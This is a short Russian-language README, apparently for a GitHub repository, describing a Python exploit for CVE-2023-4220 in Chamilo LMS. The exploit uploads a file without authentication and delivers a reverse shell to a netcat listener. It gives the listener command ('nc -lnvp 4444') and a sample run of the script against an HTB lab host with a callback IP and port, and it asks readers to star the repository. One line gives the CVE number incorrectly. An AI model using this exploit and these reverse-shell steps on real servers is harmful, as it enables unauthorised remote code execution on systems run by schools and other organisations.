
Python-эксплойт для CVE-2023-4220 в Chamilo LMS, который загружает файл и доставляет неаутентифицированный обратный шелл на слушатель netcat.
pip install requests
Python-скрипт использует уязвимость CVE-2023-422 для загрузки файла на сервер и использует этот файл для отправки обратной оболочки на слушатель netcat, и всё это можно сделать без аутентификации. Однако для успешного использования Python-скрипта вам потребуется выполнить следующие шаги.
Запуск слушателя netcat:
nc -lnvp 4444
Запуск Python-скрипта (пример):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Пожалуйста, поставьте звезду, если следующий эксплойт оказался полезен :)